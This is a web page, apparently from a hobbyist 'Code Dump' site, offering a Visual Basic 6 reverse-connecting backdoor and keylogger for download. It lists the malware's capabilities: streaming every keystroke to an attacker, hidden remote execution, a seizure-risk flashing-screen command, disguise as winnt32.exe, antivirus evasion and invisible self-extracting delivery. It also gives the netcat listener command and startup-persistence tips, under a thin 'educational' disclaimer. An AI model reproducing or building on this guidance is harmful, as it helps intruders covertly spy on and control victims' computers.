Home > Code Dump > Primitive Backdoor in Visual Basic 6 (VB6)

Primitive Backdoor in Visual Basic 6 (VB6)

A reverse connecting backdoor plus keylogger written in Visual Basic 6
By 28/12/10 [Last Edited by Joseph 28/01/11]
BOOKMARK
LOGIN
REGISTER
This backdoor is pretty primitive, but it works! Also, it hasn't been hassled by any anti-virus software that I've tested it on, as yet! Made this a while back just to see if I could! Not bad for a pile of poorly written code in an ancient programming language!

Features

  • The backdoor sends back all alphanumeric keystrokes (i.e. everything the user types on the keyboard) almost real-time from the user's computer to the attacker running netcat
  • The attacker can send commands to the backdoor running on the user's computer by using netcat, commands include:
    • popup*Your Message Here - Shows a message box to the user
    • bsod*0 - Full screen flashing black & white, fast! Could cause a fit?!
    • shell*path\to\whatever.exe - Execute something hidden on the user's machine
    • shellshow*path\to\whatever.exe - Execute something non-hidden
    • end*0 - Shutdown the backdoor
  • Shows the attacker the machine name, domain and the user which the backdoor is being run under

Things to be aware of

  • A firewall may block outbound port 5489, Windows Firewall asks the user if they'd like to give winnt32.exe permission to access the internet, unfortunately
  • The machine to connect to is statically defined in the code (currently 127.0.0.1, the same computer [loopback])
  • MSWINSCK.OCX must be present in any default path, such as the windows directory, or the same directory as the backdoor - You could make a self-extracting EXE with all the files, using Chilkat Zip2SecureEXE [There is an option to make it extract totally invisibly]
  • It's only called winnt32.exe to confuse people if they try and kill it from the processes list in task manager
  • No UAC or non-administrator problems unless for some reason MSWINSCK.OCX needs to be registered through regsvr32 or you try to touch registry keys under HKEY_LOCAL_MACHINE to get it to run on startup for all users (use HKEY_CURRENT_USER, usually each person has their own computer these days!)

NetCat

You can set up netcat to listen for connections using the command: nc -L -p 5489 (remember if you're doing this over the internet, you may need to forward port 5489 on your router)

Disclaimer

Under no circumstance am I endorsing criminal activity, this code is only permitted for use in an educational context. Anyhow, if you are intending to cause criminal damage with this code, you'll get caught quickly (your IP/host right in the source code remember! All that needs to happen is someone decompile the application and have a look at the string table...).

Download

Download Visual Basic 6 source: Backdoor2

Screenshot

As you can see here, anything which is typed on the user's computer, is sent to the attacker's machine (the user's machine in this example is also the attacker's machine: yes that is possible, but obviously is not how it would be used in a real-world situation, just for ease of taking a screenshot!).